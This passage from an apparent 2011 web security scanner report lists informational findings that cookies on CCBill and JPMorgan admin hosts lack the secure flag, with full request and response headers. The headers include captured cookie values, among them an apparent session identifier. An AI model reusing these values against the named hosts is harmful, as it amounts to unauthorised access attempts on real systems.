ETag: "4047f-2b-46050c7f1b7c0"
Accept-Ranges: bytes
Content-Length: 43
Keep-Alive: timeout=5, max=91
Connection: Keep-Alive
Content-Type: image/gif
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

GIF89a.............!.......,...........D..;

7.52. https://admin.ccbill.com/style/images/section_bg.png

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /style/images/section_bg.png

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TSc23f25

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style/images/section_bg.png HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginMM.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:00 GMT
Last-Modified: Thu, 04 Dec 2008 21:48:04 GMT
ETag: "58041a-4fc-45d3f83e52d00"
Accept-Ranges: bytes
Content-Length: 1276
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/png
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

[binary image/png body not shown]

7.53. https://admin.ccbill.com/style/images/warning_icon.png

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /style/images/warning_icon.png

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TSc23f25

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style/images/warning_icon.png HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginMM.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:10 GMT
Last-Modified: Thu, 20 Aug 2009 00:04:21 GMT
ETag: "420983-c123-471877e570b40"
Accept-Ranges: bytes
Content-Length: 49443
Keep-Alive: timeout=5, max=87
Connection: Keep-Alive
Content-Type: image/png
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

[binary image/png body not shown]

7.54. https://affiliateadmin.ccbill.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://affiliateadmin.ccbill.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TSd1de36

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: affiliateadmin.ccbill.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:23 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: TSd1de36=d97ed8a508837fe058fbda91f130c4f98e77874a1d1d18004e1c8129; Path=/
Content-Length: 3183

<html>
<head>
<link rel="stylesheet" href="/ccbill.css">
<title>CCBill.com Affiliate Admin</title>
</head>
<body>

<table border="0" class="OuterLogin" width="100%" height="100%">
<tr>
<td
...[SNIP]...

7.55. https://affiliateadmin.ccbill.com/ccbill.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://affiliateadmin.ccbill.com
Path:   /ccbill.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TSd1de36

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ccbill.css HTTP/1.1
Host: affiliateadmin.ccbill.com
Connection: keep-alive
Referer: https://affiliateadmin.ccbill.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSd1de36=d97ed8a508837fe058fbda91f130c4f98e77874a1d1d18004e1c8129

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:23 GMT
Last-Modified: Mon, 24 Sep 2007 20:23:40 GMT
ETag: "40dd6-4266-43ae76567cb00"
Accept-Ranges: bytes
Content-Length: 16998
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/css
Set-Cookie: TSd1de36=d97ed8a508837fe058fbda91f130c4f98e77874a1d1d18004e1c8129; Path=/

BODY {
scrollbar-face-color: #3876b3;
scrollbar-highlight-color: #d7d7d7;
scrollbar-3dlight-color: #cccccc;
scrollbar-darkshadow-color: #666666;
s
...[SNIP]...

7.56. https://affiliateadmin.ccbill.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   https://affiliateadmin.ccbill.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TSd1de36

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: affiliateadmin.ccbill.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSd1de36=d97ed8a508837fe058fbda91f130c4f98e77874a1d1d18004e1c8129

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:25 GMT
Last-Modified: Thu, 28 Jun 2007 17:58:59 GMT
ETag: "e7d61-1-433fb1df13ec0"
Accept-Ranges: bytes
Content-Length: 1
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain; charset=ISO-8859-1
Set-Cookie: TSd1de36=d97ed8a508837fe058fbda91f130c4f98e77874a1d1d18004e1c8129; Path=/



7.57. https://mm.jpmorgan.com/css/menu.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mm.jpmorgan.com
Path:   /css/menu.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

ACE_COOKIE

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/menu.css HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:47 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"5331-1310119392000"
Last-Modified: Fri, 08 Jul 2011 10:03:12 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:47 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 5331
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/css

#jpmmenu {
   height: 27px;
   width: 100%;
   position: relative;
   font-family: arial;
   font-size: 11px;
   z-index: 500;
   clear: both;
}

#jpmmenu .select {
   margin: 0;
   padding: 0;
   list-style
...[SNIP]...

7.58. https://mm.jpmorgan.com/css/morganmarkets.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mm.jpmorgan.com
Path:   /css/morganmarkets.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

ACE_COOKIE

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/morganmarkets.css HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:49 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"54402-1310119390000"
Last-Modified: Fri, 08 Jul 2011 10:03:10 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:49 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 54402
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/css

/* start jpm base css changes */
body {
   margin: 0;
}

ul li {
   list-style: none outside none;
}

th,td {
   border: none;
}

/* end jpm base css changes */
   /* start jpm reset-fonts-grids
...[SNIP]...

7.59. https://mm.jpmorgan.com/css/yui/base.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mm.jpmorgan.com
Path:   /css/yui/base.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

ACE_COOKIE

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/yui/base.css HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:47 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"917-1310119390000"
Last-Modified: Fri, 08 Jul 2011 10:03:10 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:47 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 917
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/css

/*
Copyright (c) 2010, Yahoo! Inc. All rights reserved.
Code licensed under the BSD License:
http://developer.yahoo.com/yui/license.html
version: 2.8.1
*/
body{margin:10px;}h1{font-size:138.5%;}
...[SNIP]...

7.60. https://mm.jpmorgan.com/css/yui/button.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mm.jpmorgan.com
Path:   /css/yui/button.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

ACE_COOKIE

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/yui/button.css HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:53 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"3664-1310119390000"
Last-Modified: Fri, 08 Jul 2011 10:03:10 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:53 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 3664
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/css

/*
Copyright (c) 2010, Yahoo! Inc. All rights reserved.
Code licensed under the BSD License:
http://developer.yahoo.com/yui/license.html
version: 2.8.1
*/
.yui-button{display:-moz-inline-box;display:i
...[SNIP]...

7.61. https://mm.jpmorgan.com/css/yui/container.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mm.jpmorgan.com
Path:   /css/yui/container.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

ACE_COOKIE

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/yui/container.css HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:54 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"4781-1310119390000"
Last-Modified: Fri, 08 Jul 2011 10:03:10 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:54 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 4781
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/css

/*
Copyright (c) 2010, Yahoo! Inc. All rights reserved.
Code licensed under the BSD License:
http://developer.yahoo.com/yui/license.html
version: 2.8.1
*/
.yui-overlay,.yui-panel-container{visib
...[SNIP]...

7.62. https://mm.jpmorgan.com/css/yui/reset-fonts-grids.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mm.jpmorgan.com
Path:   /css/yui/reset-fonts-grids.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

ACE_COOKIE

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/yui/reset-fonts-grids.css HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:53 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"5745-1310119390000"
Last-Modified: Fri, 08 Jul 2011 10:03:10 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:53 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 5745
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/css

/*
Copyright (c) 2010, Yahoo! Inc. All rights reserved.
Code licensed under the BSD License:
http://developer.yahoo.com/yui/license.html
version: 2.8.1
*/
html{color:#000;background:#FFF;}body,d
...[SNIP]...

7.63. https://mm.jpmorgan.com/css/yui/sprite.png

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mm.jpmorgan.com
Path:   /css/yui/sprite.png

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

ACE_COOKIE

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/yui/sprite.png HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:30:26 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"4761-1310119390000"
Last-Modified: Fri, 08 Jul 2011 10:03:10 GMT
Cache-Control: max-age=3600
Expires: Tue, 12 Jul 2011 17:30:26 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 4761
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/png

[binary image/png body not shown]

7.64. https://mm.jpmorgan.com/css/yui/tabview.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mm.jpmorgan.com
Path:   /css/yui/tabview.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

ACE_COOKIE

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/yui/tabview.css HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:55 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"6532-1310119390000"
Last-Modified: Fri, 08 Jul 2011 10:03:10 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:55 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 6532
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/css

/*
Copyright (c) 2010, Yahoo! Inc. All rights reserved.
Code licensed under the BSD License:
http://developer.yahoo.com/yui/license.html
version: 2.8.1
*/
.yui-navset .yui-nav li,.yui-navset .yu
...[SNIP]...

7.65. https://mm.jpmorgan.com/css/yui/treeview.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mm.jpmorgan.com
Path:   /css/yui/treeview.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

ACE_COOKIE

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/yui/treeview.css HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
